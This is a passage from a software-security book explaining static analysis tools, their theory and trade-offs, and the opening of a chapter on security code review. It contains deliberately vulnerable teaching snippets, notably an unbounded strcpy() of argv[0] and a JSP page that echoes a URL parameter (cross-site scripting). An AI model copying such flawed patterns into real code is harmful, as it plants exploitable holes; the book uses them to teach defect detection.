More commonly, verification tools check software against a partial specification that details only part of the behavior of a program. This endeavor sometimes goes by the name property checking. The majority of property checking tools work either by applying logical inference or by performing model checking. (We discuss analysis algorithms in more detail in Chapter 4.) Many property checking tools focus on temporal safety properties. A temporal safety property specifies an ordered sequence of events that a program must not carry out. An example of a temporal safety property is “a memory location should not be read after it is freed.” Most property-checking tools enable programmers to write their own specifications to check program-specific properties.

When a property checking tool discovers that the code might not match the specification, it traditionally explains its finding to the user by reporting a counterexample: a hypothetical event or sequence of events that takes place within the program that will lead to the property being violated. Example 2.6 gives a few C statements that contain a memory leak, and Example 2.7 shows how a property checking tool might go about reporting a violation of the property using a counterexample to tell the story of the leaking memory.

Example 2.6 A memory leak. If the first call to malloc() succeeds and the second fails, the memory allocated in the first call is leaked.

    1  inBuf = (char*) malloc(bufSz);
    2  if (inBuf == NULL)
    3    return -1;
    4  outBuf = (char*) malloc(bufSz);
    5  if (outBuf == NULL)
    6    return -1;

Example 2.7 A counterexample from a property checking tool running against the code in Example 2.6. The sequence of events describes a way in which the program can violate the property “allocated memory should always be freed”.

    Violation of property "allocated memory should always be freed":
      line 2: inBuf != NULL
      line 5: outBuf == NULL
      line 6: function returns (-1) without freeing inBuf

A property checking tool is said to be sound with respect to the specification if it will always report a problem if one exists. In other words, the tool will never suffer a false negative. Most tools that claim to be sound require that the program being evaluated meet certain conditions. Some disallow function pointers, while others disallow recursion or assume that two pointers never alias (point to the same memory location). Soundness is an important characteristic in an academic context, where anything less might garner the label “unprincipled.” But for large real-world bodies of code, it is almost impossible to meet the conditions stipulated by the tool, so the soundness guarantee is not meaningful. For this reason, soundness is rarely a requirement from a practitioner’s point of view.

In striving for soundness or because of other complications, a property checking tool might produce false positives. In the case of a false positive, the counterexample will contain one or more events that could not actually take place. Example 2.8 gives a second counterexample for a memory leak. This time, the property checker has gone wrong; it does not understand that, by returning NULL, malloc() is indicating that no memory has been allocated. This could indicate a problem with the way the property is specified, or it could be a problem with the way the property checker works.

Example 2.8 An errant counterexample from a property checking tool running against the code in Example 2.6. The tool does not understand that when malloc() returns NULL, no memory has been allocated, and therefore no memory needs to be freed.

    Violation of property "allocated memory should always be freed":
      line 2: inBuf == NULL
      line 3: function returns (-1) without freeing inBuf

Praxis High Integrity Systems offers a commercial program verification tool for a subset of the Ada programming language [Barnes, 2003]. Escher Technologies has its own programming language that can be compiled into C++ or Java. Numerous university research projects exist in both the program verification and property checking realm; we discuss many of them in Chapter 4. Polyspace and Grammatech both sell property checking tools.

Formal Verification and the Orange Book

Formal verification, wherein a tool applies a rigorous mathematical approach to its verification task, has a long and storied history. One of the best-known calls for the application of formal methods for the purposes of verifying security properties of system designs was included as part of the Trusted Computer System Evaluation Criteria (TCSEC), more often known by its colloquial name “the Orange Book” [DOD, 1985]. The Orange Book was written to guide developers in the creation of secure systems for sale to the U.S. government and military. The TCSEC is no longer in use, but many of the concepts it contained formed the basis for the Common Criteria (ISO/IEC standard 15408), a system for specifying and measuring security requirements. The Common Criteria are primarily used by government and military agencies in the United States and Europe.

The Orange Book outlines a hierarchy of security features and assurances along with a qualification process for certifying a product at a particular ranking.
The TCSEC covers a wide variety of subjects, including mechanisms that should be used to protect information in the system (access controls), identification and authentication of users, audit features, system specification, architecture, test and verification methods, covert channel analysis, documentation requirements, trusted product-delivery systems, and many others.

The TCSEC does not mandate the use of formal methods for any level of certification except the highest one: A1. A1 certification requires a formal demonstration that the system design meets the requirements of the security policy. Formally demonstrating that the design has been implemented without error was not required.

A1 certification entailed rigorously defining a system’s security policy and formally demonstrating that the system design enforces the policy. The few who attempted it always achieved this by hierarchically decomposing the design, showing that the highest level of abstraction meets the requirements of the security policy and that each lower level of abstraction meets the requirements specified by the next higher level.

Bug Finding

The purpose of a bug finding tool is not to complain about formatting issues, like a style checker, nor is it to perform a complete and exhaustive comparison of the program against a specification, as a program verification tool would. Instead, a bug finder simply points out places where the program will behave in a way that the programmer did not intend. Most bug finders are easy to use because they come prestocked with a set of “bug idioms” (rules) that describe patterns in code that often indicate bugs. Example 2.9 demonstrates one such idiom, known as double-checked locking. The purpose of the code is to allocate at most one object while minimizing the number of times any thread needs to enter the synchronized block.
Although it might look good, it does not work before Java 1.5: earlier Java versions did not guarantee that only one object would be allocated [Bacon, 2007]. Example 2.10 shows how the open source tool FindBugs identifies the problem [Hovemeyer and Pugh, 2004].

Example 2.9 Double-checked locking. The purpose is to minimize synchronization while guaranteeing that only one object will ever be allocated, but the idiom does not work.

    1 if (this.fitz == null) {
    2   synchronized (this) {
    3     if (this.fitz == null) {
    4       this.fitz = new Fitzer();
    5     }
    6   }
    7 }

Example 2.10 FindBugs identifies the double-checked locking idiom.

    M M DC: Possible doublecheck on Fizz.fitz in Fizz.getFitz() At[lines 1-3]

Sophisticated bug finders can extend their built-in patterns by inferring requirements from the code itself. For example, if a Java program uses the same synchronization lock to restrict access to a particular member variable in 99 out of 100 places where the member variable is used, it is likely that the lock should also protect the 100th usage of the member variable.

Some bug finding tools use the same sorts of algorithms used by property checking tools, but bug finding tools generally focus on producing a low number of false positives even if that means a higher number of false negatives. An ideal bug finding tool is sound with respect to a counterexample. In other words, when it generates a bug report, the accompanying counterexample always represents a feasible sequence of events in the program. (Tools that are sound with respect to a counterexample are sometimes called complete in academic circles.)

We think FindBugs does an excellent job of identifying bugs in Java code. Coverity makes a bug finder for C and C++. Microsoft’s Visual Studio 2005 includes the /analyze option (sometimes called Prefast) that checks for common coding errors in C and C++.
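As a side note on Example 2.9, the idiom can be made to work under the memory model introduced with Java 1.5 by declaring the field volatile. The sketch below is one possible repair, not code taken from FindBugs or from the program behind the example. The class names Fizz and Fitzer are borrowed from Examples 2.9 and 2.10, and the empty body of Fitzer is an assumption made so that the sketch compiles.

```java
// Hypothetical stand-in for the object being lazily created in Example 2.9.
class Fitzer { }

class Fizz {
    // volatile is the essential change: under the Java 5+ memory model, a thread
    // that reads a non-null reference also sees a fully constructed Fitzer.
    private volatile Fitzer fitz;

    Fitzer getFitz() {
        Fitzer local = fitz;              // one volatile read on the fast path
        if (local == null) {
            synchronized (this) {
                local = fitz;             // second check, now under the lock
                if (local == null) {
                    local = new Fitzer();
                    fitz = local;         // publish only after construction
                }
            }
        }
        return local;
    }
}
```

Repeated calls to getFitz() on the same Fizz return the same Fitzer instance. Without the volatile modifier the code is the broken idiom again, which is the kind of one-keyword difference a bug idiom rule has to take into account.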
Klocwork offers a combination program understanding and bug finding static analysis tool that enables graphical exploration of large programs.

Security Review

Security-focused static analysis tools use many of the same techniques found in other tools, but their more focused goal (identifying security problems) means that they apply these techniques differently.

The earliest security tools, ITS4 [Viega et al., 2000], RATS [RATS, 2001], and Flawfinder [Wheeler, 2001], were little more than a glorified grep; for the most part, they scanned code looking for calls to functions such as strcpy() that are easy to misuse and should be inspected as part of a manual source code review. In this sense, they were perhaps most closely related to style checkers: the things they pointed out would not necessarily cause security problems, but they were indicative of a heightened reason for security concern. Time after time, these tools have been indicted for having a high rate of false positives because people tried to interpret the tool output as a list of bugs rather than as an aid for use during code review.

Modern security tools are more often a hybrid of property checkers and bug finders. Many security properties can be succinctly expressed as program properties. For a property checker, searching for potential buffer overflow vulnerabilities could be a matter of checking the property “the program does not access an address outside the bounds of allocated memory”. From the bug finding domain, security tools adopt the notion that developers often continue to reinvent the same insecure method of solving a problem, which can be described as an insecure programming idiom.

As we noted earlier, even though bug finding techniques sometimes prove useful, security tools generally cannot inherit the bug finding tools’ tendency to minimize false positives at the expense of allowing false negatives.
Security tools tend to err on the side of caution and point out bits of code that should be subject to manual review even if the tool cannot prove that they represent exploitable vulnerabilities. This means that the output from a security tool still requires human review and is best applied as part of a code review process. (We discuss the process for applying security tools in Chapter 3, “Static Analysis as Part of Code Review.”) Even so, the better a security tool is, the better job it will do at minimizing “dumb” false positives without allowing false negatives to creep in.

Example 2.11 illustrates this point with two calls to strcpy(). Using strcpy() is simply not a good idea, but the first call cannot result in a buffer overflow; the second call will result in an overflow if argv[0] points to a very long string. (The value of argv[0] is usually, but not always, the name of the program; see footnote 2.) A good security tool places much more emphasis on the second call because it represents more than just a bad practice; it is potentially exploitable.

Example 2.11 A C program with two calls to strcpy(). A good security tool will categorize the first call as safe (though perhaps undesirable) and the second call as dangerous.

    int main(int argc, char* argv[]) {
      char buf1[1024];
      char buf2[1024];
      char* shortString = "a short string";
      strcpy(buf1, shortString); /* safe use of strcpy */
      strcpy(buf2, argv[0]);     /* dangerous use of strcpy */
      ...

Fortify Software and Ounce Labs make static analysis tools that specifically target security. Both of us are particularly fond of Fortify because we’ve put a lot of time and effort into building Fortify’s static analysis tool set. (Brian is one of Fortify’s founders, and Jacob manages Fortify’s Security Research Group.) A third company, Secure Software, sold a static analysis tool aimed at security, but in early 2007, Fortify acquired Secure’s intellectual property. Go Fortify!

Footnote 2. Under filesystems that support symbolic links, an attacker can make a symbolic link to a program, and then argv[0] will be the name of the symbolic link. In POSIX environments, an attacker can write a wrapper program that invokes a function such as execl() that allows the attacker to specify a value for argv[0] that is completely unrelated to the name of the program being invoked. Both of these scenarios are potential means of attacking a privileged program. See Chapter 12 for more about attacks such as these.

2.3 A Little Theory, a Little Reality

Static analysis is a computationally undecidable problem. Naysayers sometimes try to use this fact to argue that static analysis tools are not useful, but such arguments are specious. To understand why, we briefly discuss undecidability. After that, we move on to look at the more practical issues that make or break a static analysis tool.

In the mid-1930s, Alan Turing, as part of his conception of a general-purpose computing machine, showed that algorithms cannot be used to solve all problems. In particular, Turing posed the halting problem, the problem of determining whether a given algorithm terminates (reaches a final state). The proof that the halting problem is undecidable boils down to the fact that the only way to know for sure what an algorithm will do is to carry it out. In other words, the only guaranteed way to know what a program will do is to run it. If indeed an algorithm does not terminate, a decision about whether the algorithm terminates will never be reached. This notion of using one algorithm to analyze another (the essence of static analysis) is part of the foundation of computer science. For further reading on computational theory, we recommend Sipser’s Introduction to the Theory of Computation, Second Edition [Sipser, 2005].

In 1953, Henry Rice posed what has come to be known as Rice’s theorem.
The implication of Rice’s theorem is that static analysis cannot perfectly determine any nontrivial property of a general program. Consider the following two lines of pseudocode:

    if program p halts
      call unsafe()

It is easy to see that, to determine whether this code ever calls the function unsafe(), a static analysis tool must solve the halting problem.

Example 2.12 gives a deeper demonstration of the fundamental difficulties that force all static analysis tools to produce at least some false positives or false negatives. Imagine the existence of a function is_safe() that always returns true or false. It takes a program as an argument, and returns true if the program is safe and false if the program is not safe. This is exactly the behavior we’d like from a static analysis tool. We can informally show that is_safe() cannot possibly fulfill its promise.

Example 2.12 shows the function bother() that takes a function as its argument and calls unsafe() only if its argument is safe. The example goes on to call the function bother() on itself recursively. Assume that is_safe() itself is safe. What should the outcome be? If is_safe() declares that bother() is safe, bother() will call unsafe(). Oops. If is_safe() declares that bother() is unsafe, bother() will not call unsafe(), and, therefore, it is safe. Both cases lead to a contradiction, so is_safe() cannot possibly behave as advertised.

Example 2.12 Perfectly determining any nontrivial program property is impossible in the general case. is_safe() cannot behave as specified when the function bother() is called on itself.

    bother(function f) {
      if ( is_safe(f) )
        call unsafe();
    }
    b = bother;
    bother(b);

Success Criteria

In practice, the important thing is that static analysis tools provide useful results. The fact that they are imperfect does not prevent them from having significant value.
In fact, the undecidable nature of static analysis is not really the major limiting factor for static analysis tools. To draw an analogy from the physical world, the speed of light places a potential limitation on the maximum speed of a new car, but many engineering difficulties limit the speed of cars well before the speed of light becomes an issue. The major practical factors that determine the utility of a static analysis tool are:

• The ability of the tool to make sense of the program being analyzed
• The trade-offs the tool makes between precision and scalability
• The set of errors that the tool checks for
• The lengths to which the tool’s creators go to make the tool easy to use

Making Sense of the Program

Ascribing meaning to a piece of source code is a challenging proposition. It requires making sense of the program text, understanding the libraries that the program relies on, and knowing how the various components of the program fit together.

Different compilers (or even different versions of the same compiler) interpret source code in different ways, especially where the language specification is ambiguous or allows the compiler leeway in its interpretation of the code. A static analysis tool has to know the rules the compiler plays by to parse the code the same way the compiler does. Each corner case in the language represents another little problem for a static analysis tool. Individually, these little problems are not too hard to solve, but taken together, they make language parsing a tough job. To make matters worse, some large organizations create their own language dialects by introducing new syntax into a language. This compounds the parsing problem.

After the code is parsed, a static analysis tool must understand the effects of library or system calls invoked by the program being analyzed. This requires the tool to include a model for the behavior of library and system functions.
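To make the idea of a library model concrete, here is a minimal sketch of what one might look like for a handful of C library functions. The class LibraryModel, the fields of Summary, and the three entries are hypothetical illustrations, not the format used by any particular tool. The sketch records, among other things, that malloc() may return NULL, which is exactly the fact the property checker in Example 2.8 failed to account for.

```java
import java.util.HashMap;
import java.util.Map;

// Hypothetical, heavily simplified model of library behavior for a leak checker.
class LibraryModel {
    // What the analyzer assumes about a call whose source it cannot see.
    static final class Summary {
        final boolean allocatesMemory;
        final boolean mayReturnNull;
        final boolean writesWithoutBound;

        Summary(boolean allocatesMemory, boolean mayReturnNull, boolean writesWithoutBound) {
            this.allocatesMemory = allocatesMemory;
            this.mayReturnNull = mayReturnNull;
            this.writesWithoutBound = writesWithoutBound;
        }
    }

    private static final Map<String, Summary> MODEL = new HashMap<>();
    static {
        // Illustrative entries only; the text notes a real tool needs thousands.
        MODEL.put("malloc", new Summary(true, true, false));
        MODEL.put("strcpy", new Summary(false, false, true));
        MODEL.put("strlen", new Summary(false, false, false));
    }

    // Returns null for functions the model does not describe.
    static Summary lookup(String functionName) {
        return MODEL.get(functionName);
    }

    // A leak check should demand free() only when memory was really allocated:
    // an allocator that returned NULL allocated nothing.
    static boolean mustBeFreed(String functionName, boolean returnedNull) {
        Summary s = lookup(functionName);
        return s != null && s.allocatesMemory && !(s.mayReturnNull && returnedNull);
    }
}
```

With this model, mustBeFreed("malloc", true) is false, so the errant report in Example 2.8 would not be produced. A function missing from the table yields no summary at all, and the tool is left to guess.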
Characterizing all the relevant libraries for any widely used programming language involves understanding thousands of functions and methods. The quality of the tool’s program model, and therefore the quality of its analysis results, is directly related to the quality of its library characterizations.

Although most static analysis research has focused on analyzing a single program at a time, real software systems almost always consist of multiple cooperating programs or modules, which are frequently written in different programming languages. If a static analysis tool can analyze multiple languages simultaneously and make sense of the relationships between the different modules, it can create a system model that more accurately represents how, when, and under what conditions the different pieces of code will run.

Finally, modern software systems are increasingly driven by a critical aspect of their environment: configuration files. The better a tool can make sense of a program’s configuration information, the better the model it can create. Popular buzzwords, including system-oriented architecture, aspect-oriented programming, and dependency injection, all require understanding configuration information to accurately model the behavior of the program.

Configuration information is useful for another purpose, too. For Web-based applications, the program’s configuration often specifies the binding between the code and the URIs used to access the code. If a static analysis tool understands this binding, its output can include information about which URIs and which input parameters are associated with each vulnerability. In some cases, a dynamic testing tool can use this information to create an HTTP request to the Web application that will demonstrate the vulnerability.
Working in the other direction, when a dynamic testing tool finds a vulnerability, it can use static analysis results to provide a root-cause analysis of the vulnerability.

Not all static analysis results are easy to generate tests for, however. Some depend on very precise timing, and others require manipulation of input sources other than the HTTP request. Just because it is hard to generate a dynamic test for a static analysis result does not mean the result is invalid. Conversely, if it is easy to generate a dynamic test for a static analysis result, it is reasonable to assume that it would be easy for an attacker to generate the same test.

Trade-Offs Between Precision, Depth, and Scalability

The most precise methods of static analysis, in which all possible values and all eventualities are tracked with unyielding accuracy, are currently capable of analyzing thousands or tens of thousands of lines of code before the amount of memory used and the execution time required become unworkable. Modern software systems often involve millions or tens of millions of lines of code, so maximum precision is not a realistic possibility in many circumstances. On the other end of the spectrum, a simple static analysis algorithm, such as one that identifies the use of dangerous or deprecated functions, is capable of processing an effectively unlimited amount of code, but the results provide only limited value. Most static analysis tools sacrifice some amount of precision to achieve better scalability. Cutting-edge research projects often focus on finding better trade-offs. They look for ways to gain scalability by sacrificing precision in such a way that it will not be missed.

The depth of analysis a tool performs is often directly proportional to the scope of the analysis (the amount of the program that the tool examines at one time).
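The scalable but shallow end of this spectrum can be sketched in a few lines. The following is an illustrative line-at-a-time scanner in the spirit of early tools such as ITS4, RATS, and Flawfinder; it is not a reproduction of any of them, and the class name DangerousCallScanner and its short list of functions are assumptions chosen for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical "glorified grep": flags calls to easily misused C functions.
class DangerousCallScanner {
    // Illustrative list only; real rule sets are far larger.
    private static final Pattern CALL =
        Pattern.compile("\\b(strcpy|strcat|sprintf|gets)\\s*\\(");

    // Each line is examined in isolation, so the cost grows linearly with the
    // amount of code, but no context about buffers or data sources is available.
    static List<String> scan(List<String> sourceLines) {
        List<String> findings = new ArrayList<>();
        for (int i = 0; i < sourceLines.size(); i++) {
            Matcher m = CALL.matcher(sourceLines.get(i));
            while (m.find()) {
                findings.add("line " + (i + 1) + ": call to " + m.group(1) + "()");
            }
        }
        return findings;
    }
}
```

Run against the two strcpy() calls in Example 2.11, a scanner like this reports both in exactly the same way. Telling the safe call from the dangerous one requires knowing the sizes of the buffers and where argv[0] comes from, which means widening the scope of the analysis beyond a single line.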
Looking at each line one at a time makes for fast processing, but the lack of context necessarily means that the analysis will be superficial. At the other extreme, analyzing an entire program or an entire system provides much better context for the analysis but is expensive in terms of time, memory, or both. In between are tools that look at individual functions or modules one at a time.

From a user’s perspective, static analysis tools come in several speed grades. The fastest tools provide almost instantaneous feedback. These tools could be built into an IDE the same way an interactive spell checker is built into Microsoft Word, or they could run every time the compiler runs. With the next rung up, users might be willing to take a coffee break or get lunch while the tool runs. A programmer might use such a tool once a day or just before committing code to the source repository. At the top end, tools give up any pretense at being interactive and run overnight or over a weekend. Such tools are best suited to run as part of a nightly build or a milestone build. Naturally, the greater the depth of the analysis, the greater the runtime of the tool.

To give a rough sense of the trade-offs that tools make, Figure 2.2 considers the bug finding and security tools discussed earlier in the chapter and plots their execution time versus the scope of the analysis they perform.

[Figure 2.2: plot of execution time (blink of an eye, coffee break, overnight) against analysis scope (line, function, module, program) for ITS4, Flawfinder, RATS, MS /analyze, FindBugs, Klocwork, Fortify, Ounce, and Coverity.]

Figure 2.2 Analysis scope vs. execution time for the bug finding and security tools discussed in Section 2.1.

Finding the Right Stuff

Static analysis tools must be armed with the right set of defects to search for. What the “right set” consists of depends entirely upon the purpose of the software being analyzed. Clients fail differently than servers.
Operating systems fail differently than desktop applications. The makers of a static analysis tool must somehow take this context into account. With research tools, the most common approach is to build a tool that targets only a small number of scenarios. Commercial tools sometimes ask the user to select the scenario at hand to make decisions about what to report.

Even with a limited purview, the most valuable things to search for are often specific to the particular piece of software being evaluated. Finding these defects requires the tool to be extensible; users must be able to add their own custom rules. For example, detecting locations where private data are made public or otherwise mismanaged by a program requires adding custom rules that tell the analysis tool which pieces of data are considered private.

Just as a good program model requires a thorough characterization of the behavior of libraries and system interfaces, detecting defects requires a thorough set of rules that define where and under what circumstances the defects can occur. The size of the rule set is the first and most obvious means of comparing the capabilities of static analysis tools [McGraw, 2006], but counting the number of rules that a tool has does not tell the whole story, especially if a single rule can be applied in a variety of circumstances or can contain wildcards that match against entire families of functions. Comparing static analysis tools based on the size of their rule sets is like comparing operating systems based on the number of lines of source code they are built from.

The best way to compare static analysis tools is by using them to analyze the same code and comparing the results, but choosing the right code for comparing tools is no small problem in and of itself. A number of attempts at creating static analysis benchmarks have arisen in the last few years:

• Benjamin Livshits has put together two benchmarks for static analysis tools.
SecuriBench is a collection of open source Web-based Java programs that contain known security defects. SecuriBench Micro ( work/securibench-micro/) is a set of small hand-crafted Java programs that are intentionally written to stress different aspects of a static analysis tool.
• Zitser, Lippman, and Leek have assembled a small collection of vulnerable programs derived from real-world vulnerable programs for the purpose of testing static analysis tools [Zitser, 2004]. Kratkiewicz later created a set of scripts to generate vulnerable programs with different characteristics [Kratkiewicz, 2005].
• The SAMATE group at NIST is in the process of creating a publicly available reference data set for the purpose of benchmarking static analysis tools.
• Tim Newsham and Brian Chess have developed the Analyzer Benchmark (ABM), which consists of a mix of small hand-crafted programs and large real-world programs meant for characterizing static analysis tools [Newsham and Chess, 2005]. All of the ABM test cases have been donated to the NIST SAMATE project.
• The Department of Homeland Security’s Build Security In site hosts a set of sample programs developed by Cigital that are meant to help evaluate static analysis tools.

Beyond selecting test cases, benchmarking static analysis tools is difficult because there is no widely agreed-upon yardstick for comparing results. It’s hard to reach a general consensus about whether one possible trade-off between false positives and false negatives is better than another. If you need to perform a tool evaluation, our best advice is to run all the tools against a real body of code that you understand well. If possible, use a program that contains known vulnerabilities. Compare results in light of your particular needs.

Ease of Use

A static analysis tool is always the bearer of bad news. It must convince a programmer that the code does something unexpected or incorrect.
If the way the tool presents its findings is not clear and convincing, the programmer is not likely to take heed.

Static analysis tools have greater usability problems than that, though. If a tool does not present good error information when it is invoked incorrectly or when it cannot make sense of the code, users will not understand the limitations of the results they receive. In general, finding the source code that needs to be analyzed is a hard job because not all source files are relevant under all circumstances, and languages such as C and C++ allow code to be included or not included using preprocessor directives. The best way for a tool to identify the code that actually needs to be analyzed is for it to integrate smoothly with the program’s build system. Popular build tools include Make, Ant, Maven, and all manner of integrated development environments such as Microsoft’s Visual Studio and the open source program Eclipse. Integrating within a programmer’s development environment also provides a forum for presenting results.

In an industrial setting, a source code analysis tool must fit in as part of the software development process. (This is the topic of Chapter 3.) Because the same codebase can grow and evolve over a period of months, years, or decades, the tool should make it easy to review results through multiple revisions of the code. It should allow users to suppress false positives so that they don’t have to review them again in the future, and to look only at issues that have been introduced since the last review.

All static analysis tools make trade-offs between false positives and false negatives. Better tools allow the user to control the trade-offs they make, to meet the specific needs of the user.

Analyzing the Source vs. Analyzing Compiled Code

Most static analysis tools examine a program as the compiler sees it (by looking at the source code), but some examine the program as the runtime environment sees it (by looking at the bytecode or the executable). Looking at compiled code offers two advantages:

• The tool does not need to guess at how the compiler will interpret the code because the compiler has already done its work. Removing the compiler removes ambiguity.
• Source code can be hard to come by. In some circumstances, it is easier to analyze the bytecode or the executable simply because it is more readily available.

A few distinct disadvantages exist, too:

• Making sense out of compiled code can be tough. A native executable can be difficult to decode. This is particularly true for formats that allow variable-width instructions, such as Intel x86, because the meaning of the program changes depending upon where decoding begins. Some static analysis tools use information gleaned from dynamic analysis tools such as IDA Pro to counter this problem. Even a properly decoded binary lacks the type information that is present in source code. The lack of type information makes analysis harder. Optimizations performed by the compiler complicate matters further.

Languages such as Java that are compiled into bytecode do not have the same decoding problem, and type information is present in the bytecode, too. But even without these problems, the transformations performed by the compiler can throw away or obscure information about the programmer’s intent.

The compilation process for JavaServer Pages (JSPs) illustrates this point. The JavaServer Pages format allows a programmer to combine an HTML-like markup language with Java code. At runtime, the JSP interpreter compiles the JSP source file into Java source code and then uses the standard Java compiler to translate the Java source code into bytecode.
The three lines of JSP markup shown in Example 2.13 are relatively straightforward: They echo the value of a URL parameter. (This is a cross-site scripting vulnerability. For more information about cross-site scripting, see Chapter 9, “Web Applications.”) The JSP compiler translates these three lines of markup into more than 50 lines of Java source code, as shown in Example 2.14. The Java source code contains multiple conditionals, a loop, and several return statements, even though none of these constructs is evident in the original JSP markup. Although it is possible to understand the behavior of the JSP by analyzing the Java source, it is significantly more difficult. Taken together, these examples demonstrate the kinds of challenges that looking at compiled code can introduce.

This problem is even worse for C and C++ programs. For many kinds of program properties, analyzing the implementation of a function does not reveal the semantics of the function. Consider a function that allows the program to send a string as a SQL query to a remote database. The executable code might reveal some transformations of a string, then some packets sent out over the network, and then some packets received back from the network. These operations would not explain that the string will be interpreted as a SQL query.

• Analyzing a binary makes it harder to do a good job of reporting useful findings. Most programmers would like to see findings written in terms of source code, and that requires a binary analysis tool to map its analysis from the executable back to the source. If the binary includes debugging information, this mapping might not be too difficult, but if the binary does not have debugging information or if the compiler has optimized the code to the point that it does not easily map back to the source, it will be hard to make sense of the analysis results.

For bytecode formats such as Java, there is no clear right answer.
The source code contains more information, but the bytecode is easier to come by. For native programs, the disadvantages easily outweigh the advantages; analyzing the source is easier and more effective.

Example 2.13 A small example of Java Server Page (JSP) markup. The code echoes the value of a URL parameter (a cross-site scripting vulnerability).

Example 2.14 Three lines of JSP markup are transformed into more than 50 lines of Java code. The Java code is much harder to understand than the JSP markup. Translating JSP into Java before analyzing it makes the analysis job much harder.

    if (_fmt_message0 == null)
      _fmt_message0 =
        new org.apache.taglibs.standard.tag.el.fmt.MessageTag();
    _fmt_message0.setPageContext(pageContext);
    _fmt_message0.setParent((javax.servlet.jsp.tagext.Tag)null);
    _activeTag = _fmt_message0;
    _fmt_message0.setKey(
      weblogic.utils.StringUtils.valueOf("hello"));
    _int0 = _fmt_message0.doStartTag();
    if (_int0 != Tag.SKIP_BODY) {
      if (_int0 == BodyTag.EVAL_BODY_BUFFERED) {
        out = pageContext.pushBody();
        _fmt_message0.setBodyContent((BodyContent)out);
        _fmt_message0.doInitBody();
      }
      do {
        out.print("\r\n ");
        if (_fmt_param0 == null)
          _fmt_param0 =
            new org.apache.taglibs.standard.tag.el.fmt.ParamTag();
        _fmt_param0.setPageContext(pageContext);
        _fmt_param0.setParent(
          (javax.servlet.jsp.tagext.Tag)_fmt_message0);
        _activeTag = _fmt_param0;
        _fmt_param0.setValue(
          weblogic.utils.StringUtils.valueOf("${param.test}"));
        _int1 = _fmt_param0.doStartTag();
        weblogic.servlet.jsp.StandardTagLib.fakeEmptyBodyTag(
          pageContext, _fmt_param0, _int1, true);
        if (_fmt_param0.doEndTag() == Tag.SKIP_PAGE) {
          _activeTag = null;
          _releaseTags(_fmt_param0);
          return;
        }
        _activeTag = _fmt_param0.getParent();
        _fmt_param0.release();
        out.print("\r\n ");
      } while (_fmt_message0.doAfterBody() ==
               IterationTag.EVAL_BODY_AGAIN);
      if (_int0 == BodyTag.EVAL_BODY_BUFFERED)
        out = pageContext.popBody();
    }
    if (_fmt_message0.doEndTag() == Tag.SKIP_PAGE) {
      _activeTag = null;
      _releaseTags(_fmt_message0);
      return;
    }
    _activeTag = _fmt_message0.getParent();
    _fmt_message0.release();
    _writeText(response, out, _wl_block2, _wl_block2Bytes);

Summary

Static analysis is useful for many purposes, but it is especially useful for security because it provides a means of thorough analysis that is not otherwise feasible. Table 2.1 lists the static analysis tools discussed in the chapter.

All static analysis tools produce at least some false positives or some false negatives, but most produce both. For security purposes, false negatives are more troublesome than false positives, although too many false positives can lead a reviewer to overlook true positives.

Practical challenges for static analysis tools include the following:

• Making sense of the program (building an accurate program model)
• Making good trade-offs between precision, depth, and scalability
• Looking for the right set of defects
• Presenting easy-to-understand results and errors
• Integrating easily with the build system and integrated development environments

Static analysis tools can analyze source or compiled code. For bytecode languages such as Java, the two approaches are on roughly equal footing. For C and C++ programs, analyzing compiled code is harder and produces inferior results.

Table 2.1 Static analysis tools discussed in the chapter.

    Type of Tool             Vendors
    Style Checking           PMD; Parasoft
    Program Understanding    Fujaba; CAST
    Program Verification     Praxis High Integrity Systems; Escher Technologies
    Property Checking        Polyspace; Grammatech
    Bug Finding              FindBugs; Coverity; Visual Studio 2005 /analyze; Klocwork
    Security Review          Fortify Software; Ounce Labs

3 Static Analysis as Part of the Code Review Process

In preparing for battle, plans are useless but planning is indispensable.
-- Dwight Eisenhower

There’s a lot to know about how static analysis tools work. There’s probably just as much to know about making static analysis tools work as part of a secure development process. In this respect, tools that assist with security review are fundamentally different from most other kinds of software development tools. A debugger, for example, doesn’t require any organization-wide planning to be effective. An individual programmer can run it when it’s needed, obtain results, and move on to another programming task. But the need for software security rarely creates the kind of urgency that leads a programmer to run a debugger. For this reason, an organization needs a plan for who will conduct security reviews, when the reviews will take place, and how to act on the results. Static analysis tools should be part of the plan because they can make the review process significantly more efficient.

Code review is a skill. In the first part of this chapter, we look at what that skill entails and outline the steps involved in performing a code review. We pay special attention to the most common snag that review teams get hung up on: debates about exploitability. In the second part of the chapter, we look at who needs to develop the code review skill and when they need to apply it. Finally, we look at metrics that can be derived from static analysis results.

3.1 Performing a Code Review

A security-focused code review happens for a number of different reasons:

• Some reviewers start out with the need to find a few exploitable vulnerabilities to prove that additional security investment is justified.
• For every large project that didn’t begin with security in mind, the team eventually has to make an initial pass through the code to do a security retrofit.
• At least once in every release period, every project should receive a security review to account for new features and ongoing maintenance work.

Of the three, the second requires by far the largest amount of time and energy. Retrofitting a program that wasn’t written to be secure can be a considerable amount of work. Subsequent reviews of the same piece of code will be easier. The initial review likely will turn up many problems that need to be addressed. Subsequent reviews should find fewer problems because programmers will be building on a stronger foundation.

Steve Lipner estimates that at Microsoft security activities consume roughly 20% of the release schedule the first time a product goes through Microsoft’s Security Development Lifecycle. In subsequent iterations, security requires less than 10% of the schedule [Lipner, 2006]. Our experience with the code review phase of the security process is similar: after the backlog of security problems is cleared out, keeping pace with new development requires much less effort.

The Review Cycle

We begin with an overview of the code review cycle and then talk about each phase in detail. The four major phases in the cycle are:

1. Establish goals
2. Run the static analysis tool
3. Review code (using output from the tool)
4. Make fixes

Figure 3.1 shows a few potential back edges that make the cycle a little more complicated than a basic box step. The frequency with which the cycle is repeated depends largely upon the goals established in the first phase, but our experience is that if a first iteration identifies more than a handful of security problems, a second iteration likely will identify problems too.

Figure 3.1 The code review cycle: 1. Establish Goals, 2. Run Tools, 3. Review Code, 4. Make Fixes.

Later in the chapter, we discuss when to perform code review and who should do the reviewing, but we put forth a typical scenario here to set the stage.
Imagine the first iteration of the cycle being carried out midway through the time period allocated for coding. Assume that the reviewers are programmers who have received security training.

1. Establish Goals

A well-defined set of security goals will help prioritize the code that should be reviewed and the criteria that should be used to review it. Your goals should come from an assessment of the software risks you face. We sometimes hear sweeping high-level objectives along these lines:

• “If it can be reached from the Internet, it has to be reviewed before it’s released.”

or

• “If it handles money, it has to be reviewed at least once a year.”

We also talk to people who have more specific tactical objectives in mind. A short-term focus might come from a declaration:

• “We can’t fail our next compliance audit. Make sure the auditor gives us a clean bill of health.”

or

• “We’ve been embarrassed by a series of cross-site scripting vulnerabilities. Make it stop.”

